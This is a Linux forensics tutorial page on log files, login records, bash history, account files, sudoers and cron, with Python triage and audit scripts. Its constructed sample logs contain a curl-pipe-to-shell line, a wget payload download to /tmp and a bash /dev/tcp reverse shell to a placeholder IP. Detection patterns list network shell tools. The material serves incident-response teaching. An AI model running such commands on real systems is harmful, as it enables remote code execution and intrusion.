Linux Forensics

Log Files, Shell Artifacts & User Analysis

Section 5 of 12

Linux File System Hierarchy

/var (Variable Data)

  • /var/log - System and application logs
  • /var/spool - Print/email queues
  • /var/tmp - Temporary files (persistent)
  • /var/cache - Application cache

/etc (Configuration)

  • /etc/passwd - User accounts
  • /etc/shadow - Password hashes
  • /etc/group - Group information
  • /etc/sudoers - Sudo privileges

/home (User Directories)

  • .bash_history - Command history
  • .bashrc - Shell configuration
  • .ssh/ - SSH keys and config
  • .mozilla/ - Browser data

/tmp (Temporary)

  • Usually cleared on reboot (tmpfs or systemd-tmpfiles); /var/tmp and /dev/shm are the other world-writable locations, and /var/tmp survives reboots
  • World-writable - any user or compromised service can drop files there
  • Common malware staging and execution location
  • Check for files referenced by persistence mechanisms (cron jobs, shell startup files)

Critical Log Files (/var/log)

auth.log / secure

Authentication attempts, sudo usage, SSH logins. Debian/Ubuntu write /var/log/auth.log, RHEL/Fedora /var/log/secure; systems that log only to journald have neither and must be queried through journalctl. Older entries live in the rotated copies (auth.log.1, auth.log.*.gz), so search those as well.

# View failed login attempts

grep "Failed password" /var/log/auth.log

# Check sudo usage

grep "sudo" /var/log/auth.log
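The same triage done as a script rather than a string of greps, added here as an example (not part of the original page): it counts failed SSH password attempts per source and target, lists successful logins and sudo commands, and flags the pattern that matters most, a source that failed repeatedly and then received an Accepted line. The log lines are constructed for the example; the regexes follow the standard OpenSSH and sudo message shapes, and the script assumes the classic syslog layout rather than journald output.

```python
import re
import sys
from collections import Counter

# Constructed sample in the classic syslog auth.log layout; not a real capture.
SAMPLE_AUTH_LOG = """\
Mar  4 09:12:01 web01 sshd[2201]: Failed password for invalid user admin from 203.0.113.9 port 51022 ssh2
Mar  4 09:12:03 web01 sshd[2201]: Failed password for invalid user admin from 203.0.113.9 port 51022 ssh2
Mar  4 09:12:05 web01 sshd[2204]: Failed password for root from 203.0.113.9 port 51030 ssh2
Mar  4 09:12:08 web01 sshd[2204]: Failed password for root from 203.0.113.9 port 51030 ssh2
Mar  4 09:12:11 web01 sshd[2208]: Accepted password for root from 203.0.113.9 port 51040 ssh2
Mar  4 09:13:40 web01 sshd[2310]: Accepted publickey for alice from 198.51.100.4 port 40110 ssh2: ED25519 SHA256:abc
Mar  4 09:14:02 web01 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/apt update
Mar  4 09:15:30 web01 sudo:      bob : TTY=pts/1 ; PWD=/tmp ; USER=root ; COMMAND=/bin/bash -c curl http://203.0.113.9/x.sh|sh
Mar  4 09:15:31 web01 sudo: pam_unix(sudo:session): session opened for user root(uid=0) by bob(uid=1002)
"""

# Standard OpenSSH and sudo message shapes.
FAILED_RE = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")
ACCEPTED_RE = re.compile(r"sshd\[\d+\]: Accepted (\S+) for (\S+) from (\S+) port \d+")
SUDO_RE = re.compile(r" sudo:\s+(\S+) : .*?USER=(\S+) ; COMMAND=(.*)$")


def _stamp(line):
    return line[:15]  # "Mar  4 09:12:01": syslog stamps carry no year


def failed_logins(text):
    """Failed SSH password attempts, counted per (source IP, target user)."""
    counts = Counter()
    for line in text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            counts[(m.group(2), m.group(1))] += 1
    return counts


def accepted_logins(text):
    """Successful SSH logins with the authentication method used."""
    out = []
    for line in text.splitlines():
        m = ACCEPTED_RE.search(line)
        if m:
            out.append({"time": _stamp(line), "method": m.group(1),
                        "user": m.group(2), "ip": m.group(3)})
    return out


def sudo_commands(text):
    """Commands run through sudo: who, as whom, what."""
    out = []
    for line in text.splitlines():
        m = SUDO_RE.search(line)
        if m:
            out.append({"time": _stamp(line), "user": m.group(1),
                        "as": m.group(2), "command": m.group(3)})
    return out


def brute_force_successes(text, threshold=3):
    """Sources that failed at least `threshold` times and then received an
    Accepted line: the signature of a guessed password. Relies on file order,
    which is the only ordering syslog stamps (no year) reliably give."""
    fails = Counter()
    hits = []
    for line in text.splitlines():
        f = FAILED_RE.search(line)
        if f:
            fails[f.group(2)] += 1
            continue
        a = ACCEPTED_RE.search(line)
        if a and fails[a.group(3)] >= threshold:
            hits.append((a.group(3), a.group(2), fails[a.group(3)]))
    return hits


if __name__ == "__main__":
    text = open(sys.argv[1], errors="replace").read() if len(sys.argv) > 1 else SAMPLE_AUTH_LOG
    for (ip, user), n in failed_logins(text).most_common():
        print(f"failed   {n:4d}  {ip:15s} -> {user}")
    for a in accepted_logins(text):
        print(f"accepted {a['time']}  {a['user']}@{a['ip']} via {a['method']}")
    for s in sudo_commands(text):
        print(f"sudo     {s['time']}  {s['user']} as {s['as']}: {s['command']}")
    for ip, user, n in brute_force_successes(text):
        print(f"ALERT    {ip} logged in as {user} after {n} failures")
```

Run it against a copied log (`python3 auth_triage.py auth.log`); feed rotated .gz files through zcat first. Because syslog stamps carry no year, the brute-force check keys on line order, which is right for a single file but wrong if several files are concatenated out of sequence.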

syslog / messages

General system messages, kernel messages and service status (Debian/Ubuntu: /var/log/syslog; RHEL/Fedora: /var/log/messages; kernel messages also go to /var/log/kern.log and dmesg)

# View the most recent system messages (tail -f follows a live log; on a copied log or a mounted image use -n)

tail -n 100 /var/log/syslog

# Search for errors

grep -i "error" /var/log/syslog

btmp / wtmp / lastlog

Login records in the binary utmp format; read each with its matching tool, or dump any of them to text with utmpdump.

  • /var/log/btmp - Failed login attempts; read with lastb
  • /var/log/wtmp - All logins, logouts and reboots; read with last
  • /var/log/lastlog - Most recent login per user (a sparse file indexed by UID); read with lastlog

Point the tools at files copied from an image with last -f /path/to/copied/wtmp (lastb is last with /var/log/btmp as its default file). A missing or zero-byte wtmp or btmp on a system that has been running for months is itself a finding: attackers truncate these files to hide their sessions, so record their size and mtime before anything else.
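The page says these files need special tools; this added example (not from the original page) shows what those tools do: a minimal parser for the utmp record format that last, lastb and utmpdump read, plus the login/logout pairing that last performs per terminal line. It assumes the glibc layout on x86_64 (384-byte records, 32-bit seconds); on a different layout the file size will not be a multiple of 384 and UTMP_FORMAT must be adjusted. The sample wtmp bytes are constructed with the same packer, and the hostnames and addresses in them are made up.

```python
import socket
import struct
from datetime import datetime, timezone

# glibc struct utmp as laid out on x86_64 (assumed): 384 bytes, 32-bit tv_sec.
# Sanity check on a real file: its size must be a multiple of 384.
UTMP_FORMAT = "<h2xi32s4s32s256shhi2i16s20x"
UTMP_SIZE = struct.calcsize(UTMP_FORMAT)  # 384

UT_TYPES = {0: "EMPTY", 1: "RUN_LVL", 2: "BOOT_TIME", 3: "NEW_TIME", 4: "OLD_TIME",
            5: "INIT_PROCESS", 6: "LOGIN_PROCESS", 7: "USER_PROCESS",
            8: "DEAD_PROCESS", 9: "ACCOUNTING"}
BOOT_TIME, USER_PROCESS, DEAD_PROCESS = 2, 7, 8


def _cstr(raw):
    """NUL-terminated fixed-width field to str."""
    return raw.split(b"\0", 1)[0].decode("utf-8", "replace")


def parse_utmp(data):
    """Decode every record in a wtmp/btmp/utmp blob, in file order.
    For btmp every record is one failed login attempt (what lastb prints)."""
    records = []
    for off in range(0, len(data) - len(data) % UTMP_SIZE, UTMP_SIZE):
        (ut_type, pid, line, _id, user, host, _term, _exit, _session,
         tv_sec, _tv_usec, addr) = struct.unpack_from(UTMP_FORMAT, data, off)
        records.append({
            "type": UT_TYPES.get(ut_type, str(ut_type)),
            "pid": pid,
            "line": _cstr(line),
            "user": _cstr(user),
            "host": _cstr(host),
            "ip": socket.inet_ntoa(addr[:4]) if any(addr[:4]) else "",  # IPv4 only
            "time": tv_sec,
        })
    return records


def _session(start, end, state):
    return {"user": start["user"], "line": start["line"], "host": start["host"],
            "ip": start["ip"], "login": start["time"], "logout": end,
            "duration": (end - start["time"]) if end is not None else None,
            "state": state}


def reconstruct_sessions(records):
    """Pair logins with logouts per terminal line, the way `last` does.
    A BOOT_TIME record while sessions are open marks them 'crash'; sessions
    still open at end of file are 'still logged in'."""
    open_by_line, sessions = {}, []
    for r in records:
        if r["type"] == "USER_PROCESS":
            open_by_line[r["line"]] = r  # a new login on the line supersedes an old one
        elif r["type"] == "DEAD_PROCESS" and r["line"] in open_by_line:
            sessions.append(_session(open_by_line.pop(r["line"]), r["time"], "logout"))
        elif r["type"] == "BOOT_TIME":
            sessions.extend(_session(s, r["time"], "crash") for s in open_by_line.values())
            open_by_line.clear()
    sessions.extend(_session(s, None, "still logged in") for s in open_by_line.values())
    return sessions


def pack_record(ut_type, user, line, host, tv_sec, pid=0, ipv4=""):
    """Build one raw record; used here only to construct the sample file."""
    addr = (socket.inet_aton(ipv4) if ipv4 else b"").ljust(16, b"\0")
    return struct.pack(UTMP_FORMAT, ut_type, pid, line.encode(), b"", user.encode(),
                       host.encode(), 0, 0, 0, tv_sec, 0, addr)


# Constructed wtmp: boot, alice logs in and out, root logs in, box reboots with root still on.
SAMPLE_WTMP = b"".join([
    pack_record(BOOT_TIME, "reboot", "~", "6.1.0-example", 1700000000),
    pack_record(USER_PROCESS, "alice", "pts/0", "203.0.113.5", 1700003600, pid=1234, ipv4="203.0.113.5"),
    pack_record(DEAD_PROCESS, "", "pts/0", "", 1700005400, pid=1234),
    pack_record(USER_PROCESS, "root", "pts/1", "198.51.100.7", 1700007200, pid=2345, ipv4="198.51.100.7"),
    pack_record(BOOT_TIME, "reboot", "~", "6.1.0-example", 1700010800),
])


def read_utmp_file(path):
    """Parse a wtmp/btmp copied from a live box or a mounted image."""
    with open(path, "rb") as fh:
        return parse_utmp(fh.read())


def _fmt(ts):
    return datetime.fromtimestamp(ts, timezone.utc).strftime("%Y-%m-%d %H:%M:%S") if ts else "-"


if __name__ == "__main__":
    for s in reversed(reconstruct_sessions(parse_utmp(SAMPLE_WTMP))):  # newest first, like last
        print(f"{s['user']:<9}{s['line']:<8}{s['ip']:<16}{_fmt(s['login'])} - {_fmt(s['logout'])}  {s['state']}")
```

The file is appended in chronological order, so a record whose timestamp is older than the one before it, or a run of records missing between a login and its DEAD_PROCESS, is evidence of editing rather than of normal use.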

Bash History & Shell Artifacts

.bash_history

Commands typed in interactive bash sessions, one per line. Golden artifact for understanding user actions and attacker behavior. Other shells keep their own files (zsh: .zsh_history), so check which shell the account uses in /etc/passwd.

Location

/home/[username]/.bash_history
/root/.bash_history

Important Notes

  • Written when the interactive shell exits, not after each command: a session that is still open, or one killed with SIGKILL, has left nothing in the file yet (unless PROMPT_COMMAND runs history -a)
  • Timestamps exist only if HISTTIMEFORMAT was set when the commands were typed; bash then stores a #<epoch> line before each command
  • Easily tampered with: attackers clear it, truncate it, or replace it with a symlink to /dev/null
  • Check for gaps and anomalies: compare the file's size and mtime with the user's login records; an empty or short file for an active account, or content that stops before the last login, points at deletion

What to Look For

🚩 Red Flags

  • history -c (clears the in-memory history)
  • rm ~/.bash_history, or ~/.bash_history as a symlink to /dev/null
  • export HISTFILESIZE=0 or HISTSIZE=0, unset HISTFILE, set +o history
  • HISTCONTROL=ignorespace or ignoreboth in the shell config: commands typed with a leading space are not recorded, so the file understates what was run
  • Downloading tools (wget, curl), then chmod +x and execution from /tmp or /dev/shm

🔍 Investigate

  • SSH connections made (ssh, scp, sftp to other hosts: lateral movement)
  • File modifications/deletions
  • Network connections
  • Privilege escalation attempts (sudo -l, su, searches for setuid binaries)
  • Data exfiltration commands (tar or zip of data followed by scp, curl -T, nc)

Analysis Commands

# Load the user's file into a dedicated analysis shell and show it with timestamps
# (history -c first clears that shell's own list; times appear only if the file has #<epoch> lines)

export HISTTIMEFORMAT='%F %T '
history -c
history -r /home/[username]/.bash_history
history

# Search for specific commands (-w stops "nc" matching inside "rsync")

grep -Ew "wget|curl|nc|ncat|bash" /home/[username]/.bash_history
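An added example (not from the original page) that turns the red-flag list above into a check you can run against a copied history file: it pairs HISTTIMEFORMAT #epoch lines with their commands, flags anti-forensics and tooling commands, finds large time gaps, and inspects the file itself for the symlink-to-/dev/null trick. The history content is constructed; the patterns and the gap threshold are a starting point, not a complete signature set.

```python
import os
import re

# Constructed ~/.bash_history as written with HISTTIMEFORMAT set; not a real capture.
SAMPLE_HISTORY = """\
#1709543500
ls -la
#1709543520
cd /tmp
#1709543530
wget http://203.0.113.9/x.sh -O /tmp/.x
#1709543535
chmod +x /tmp/.x
#1709543540
nohup /tmp/.x &
#1709621000
sudo -l
#1709621010
bash -i >& /dev/tcp/203.0.113.9/4444 0>&1
#1709621020
rm ~/.bash_history
"""

TIMESTAMP_RE = re.compile(r"^#(\d+)$")  # bash writes '#<epoch>' before each command

# (pattern, reason): a starting set, not a complete signature list.
RED_FLAGS = [
    (r"\bhistory\s+-c\b", "history cleared in-session"),
    (r"\brm\b.*\.bash_history", "history file removed"),
    (r"\b(HISTFILESIZE|HISTSIZE)=0\b", "history size zeroed"),
    (r"\bunset\s+HISTFILE\b|HISTFILE=/dev/null", "history file disabled"),
    (r"\bset\s+\+o\s+history\b", "history recording switched off"),
    (r"\b(wget|curl)\b", "download tool"),
    (r"\b(nc|ncat|netcat|socat)\b", "network tool"),
    (r"/dev/tcp/", "bash /dev/tcp reverse shell"),
    (r"(^|\s)(/tmp|/dev/shm|/var/tmp)/", "path in world-writable directory"),
]


def parse_history(text):
    """[(epoch or None, command)]: a '#<epoch>' line applies to the command after it."""
    entries, pending = [], None
    for line in text.splitlines():
        m = TIMESTAMP_RE.match(line)
        if m:
            pending = int(m.group(1))
            continue
        if line.strip():
            entries.append((pending, line))
            pending = None
    return entries


def flag_commands(entries):
    """[(index, command, [reasons])] for every command matching a red flag."""
    flagged = []
    for i, (_, cmd) in enumerate(entries):
        reasons = [why for pat, why in RED_FLAGS if re.search(pat, cmd)]
        if reasons:
            flagged.append((i, cmd, reasons))
    return flagged


def find_gaps(entries, threshold):
    """Jumps larger than `threshold` seconds between consecutive timestamped commands.
    A gap is only suggestive: idle time and a cleared stretch of history look the same."""
    gaps, prev_i, prev_ts = [], None, None
    for i, (ts, _) in enumerate(entries):
        if ts is None:
            continue
        if prev_ts is not None and ts - prev_ts > threshold:
            gaps.append((prev_i, i, ts - prev_ts))
        prev_i, prev_ts = i, ts
    return gaps


def inspect_history_file(path):
    """File-level checks: missing, empty, or a symlink pointing at /dev/null."""
    info = {"path": path, "exists": os.path.lexists(path), "symlink_to": None,
            "size": None, "mtime": None}
    if info["exists"]:
        st = os.lstat(path)
        info["symlink_to"] = os.readlink(path) if os.path.islink(path) else None
        info["size"] = None if info["symlink_to"] else st.st_size
        info["mtime"] = int(st.st_mtime)
    return info


if __name__ == "__main__":
    entries = parse_history(SAMPLE_HISTORY)
    for i, cmd, reasons in flag_commands(entries):
        print(f"[{i}] {cmd}\n      {', '.join(reasons)}")
    for a, b, secs in find_gaps(entries, 12 * 3600):
        print(f"gap of {secs // 3600}h between entries {a} and {b}")
    print(inspect_history_file(os.path.expanduser("~/.bash_history")))  # demo on your own file
```

On the constructed sample the last command is the anti-forensics step itself; it survives in the file because bash rewrites the history at exit with everything typed in that session, including the rm. The tricks that leave no trace in the file (ignorespace, unset HISTFILE, a /dev/null symlink) are the reason the file-level check and the comparison with wtmp matter.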

User Account Analysis

/etc/passwd

User account information (world-readable)

username:x:UID:GID:comment:home:shell

root:x:0:0:root:/root:/bin/bash

john:x:1001:1001:John Doe:/home/john:/bin/bash

  • Check for UID 0 (root equivalent) on any account other than root, and for duplicate UIDs
  • Look for unusual shells: a service account (UID below 1000 on most distributions) with /bin/bash instead of /usr/sbin/nologin, or an interactive shell on an account that should never log in
  • The x in the password field means the hash is in /etc/shadow; an empty field (no password) or a hash stored here directly is a finding
  • Verify legitimate users against the organisation's account records, and check the file's mtime against the incident timeline

/etc/shadow

Password hashes (root-only)

username:hash:lastchange:min:max:warn:inactive:expire:reserved

root:$6$random$longhash...

  • The hash prefix names the algorithm: $6$ = SHA-512, $5$ = SHA-256, $y$ = yescrypt, $2b$ = bcrypt, $1$ = MD5 (weak); no $ prefix at all = legacy DES crypt (weak)
  • Empty hash field = login without a password; ! or * = locked account (normal for service accounts)
  • Check for weak hash types and for accounts with no password
  • Verify password change dates (field 3, days since 1970-01-01) against the incident timeline; a change nobody remembers making is suspicious
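An added example (not from the original page): an audit of /etc/passwd and /etc/shadow contents with the checks listed above. The two files are constructed samples with placeholder hashes; UID_MIN=1000 is the assumed login.defs boundary between system and human accounts, and the "recent change" window is a parameter you set from the incident timeline.

```python
from datetime import date, timedelta

# Constructed /etc/passwd and /etc/shadow samples; hashes are placeholders, not real.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/bash
john:x:1001:1001:John Doe:/home/john:/bin/bash
backup:x:1002:1002::/home/backup:/bin/bash
sysadm:x:0:0::/root:/bin/bash
svc:x:1003:1003::/var/lib/svc:/usr/sbin/nologin
"""
SAMPLE_SHADOW = """\
root:$6$saltsalt$placeholderhash:19700:0:99999:7:::
daemon:*:19000:0:99999:7:::
www-data:*:19000:0:99999:7:::
john:$y$j9T$saltsalt$placeholderhash:19780:0:99999:7:::
backup::19785:0:99999:7:::
sysadm:$1$saltsalt$placeholderhash:19785:0:99999:7:::
svc:!:19000:0:99999:7:::
"""

UID_MIN = 1000  # assumed login.defs UID_MIN: UIDs below it are system accounts
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/usr/bin/false"}
HASH_NAMES = {"$1$": "MD5-crypt", "$2b$": "bcrypt", "$5$": "SHA-256",
              "$6$": "SHA-512", "$y$": "yescrypt"}
WEAK_ALGOS = {"MD5-crypt", "DES crypt"}


def parse_colon_file(text):
    return [line.split(":") for line in text.splitlines()
            if line.strip() and not line.startswith("#")]


def audit_passwd(text):
    """(account, finding) pairs for the /etc/passwd checks."""
    findings, seen = [], {}
    for name, pw, uid, _gid, _gecos, _home, shell in (f[:7] for f in parse_colon_file(text)):
        uid = int(uid)
        if uid == 0 and name != "root":
            findings.append((name, "UID 0 account that is not root"))
        if uid in seen:
            findings.append((name, f"duplicate UID {uid} (also used by {seen[uid]})"))
        seen.setdefault(uid, name)
        if pw != "x":
            findings.append((name, "password field is not 'x' (empty, or hash kept in passwd)"))
        if 0 < uid < UID_MIN and shell not in NOLOGIN_SHELLS:
            findings.append((name, f"system account with interactive shell {shell}"))
    return findings


def hash_algorithm(hash_):
    """Name the crypt algorithm from the $id$ prefix; no prefix means DES crypt."""
    if hash_.startswith("$") and hash_.count("$") >= 2:
        return HASH_NAMES.get("$" + hash_.split("$")[1] + "$", "unknown $id$")
    return "DES crypt"


def audit_shadow(text, as_of, recent_days=3):
    """(account, finding) pairs; `as_of` is an ISO date, usually the incident date."""
    as_of_d = date.fromisoformat(as_of)
    findings = []
    for fields in parse_colon_file(text):
        name, hash_, lastchg = fields[0], fields[1], fields[2]
        if hash_ == "":
            findings.append((name, "empty password field: login without a password"))
        elif not hash_.startswith(("!", "*")):  # '!' and '*' mean locked: normal for services
            algo = hash_algorithm(hash_)
            if algo in WEAK_ALGOS:
                findings.append((name, f"weak hash algorithm {algo}"))
        if lastchg.isdigit():  # field 3 is days since the epoch
            changed = date(1970, 1, 1) + timedelta(days=int(lastchg))
            if 0 <= (as_of_d - changed).days <= recent_days:
                findings.append((name, f"password changed {changed.isoformat()}, "
                                       f"within {recent_days} days of {as_of}"))
    return findings


if __name__ == "__main__":
    for account, why in audit_passwd(SAMPLE_PASSWD) + audit_shadow(SAMPLE_SHADOW, "2024-03-04"):
        print(f"{account:10s} {why}")
```

To run it on an image, read the two files from the mounted root instead of the samples; the functions only need the text. The duplicate-UID check fires for sysadm on top of the UID 0 check because both conditions are worth reporting separately: a second UID 0 entry is the classic backdoor account, while duplicate non-zero UIDs make ownership and log attribution ambiguous.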

Sudoers Analysis

Check who has sudo privileges and what they can execute. Rules can also live in /etc/sudoers.d/, so read both. Look for NOPASSWD, ALL=(ALL) on unexpected users or groups, and allowed commands that can spawn a shell or write files as root (editors, less, find, tar). Use visudo -c to confirm the files parse, and never open them in a plain editor on a live system.

# View sudoers file and drop-ins (read-only!)

cat /etc/sudoers /etc/sudoers.d/*

# Check a user's sudo privileges (needs root)

sudo -l -U username

# Review sudo logs

grep sudo /var/log/auth.log

Cron Jobs & Scheduled Tasks

Cron jobs automate tasks on Linux. Common persistence mechanism for attackers.

System Cron Locations

  • /etc/crontab - System-wide crontab; each entry carries a user field before the command
  • /etc/cron.d/ - Additional cron files in the same format as /etc/crontab, dropped in by packages (or by attackers)
  • /etc/cron.{hourly,daily,weekly,monthly}/ - Scheduled scripts run by run-parts
  • /var/spool/cron/crontabs/ - User crontabs, one file per user, no user field (Debian/Ubuntu; RHEL/Fedora use /var/spool/cron/)

Cron Syntax

# Min Hour Day Month Weekday Command

* * * * * /path/to/command

# Run every day at 2 AM

0 2 * * * /backup.sh

Check for:

  • Unusual scripts or commands, especially under /tmp, /dev/shm or hidden dot-directories
  • Network connections
  • Downloads (wget/curl), in particular when piped into a shell
  • Reverse shells (nc, or bash -i with /dev/tcp)
  • @reboot entries and every-minute (* * * * *) schedules, the usual way to keep a foothold alive

Cron Analysis Commands

# List the current user's cron jobs

crontab -l

# List every user's cron jobs (as root; users without a crontab are skipped silently)

for user in $(cut -f1 -d: /etc/passwd); do echo "== $user"; crontab -u "$user" -l 2>/dev/null; done

On an image, read the spool directory and /etc/cron.d directly instead of running crontab, and remember that at jobs and systemd timers can schedule work that no cron listing shows.